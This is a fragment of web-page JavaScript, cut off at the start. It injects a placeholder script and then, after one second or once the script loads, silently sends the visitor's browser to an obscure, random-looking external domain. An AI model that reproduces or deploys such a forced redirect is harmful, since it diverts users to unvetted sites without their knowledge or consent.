"; // Replace with actual JS later // Append the script to the document head document.head.appendChild(script); // Set a timeout for 1 second const timeout = setTimeout(() => { redirectToUrl(); }, 1000); // On script load, clear the timeout and redirect script.onload = () => { clearTimeout(timeout); redirectToUrl(); }; // Function to redirect to the specified URL function redirectToUrl() { // Get the current URL's path and query string const currentPathAndQuery = "/"; // Append the path and query to the redirect URL const targetUrl = "https://www.bbfi6qtrk.com" + currentPathAndQuery; // Perform the redirect window.location.href = targetUrl; } })();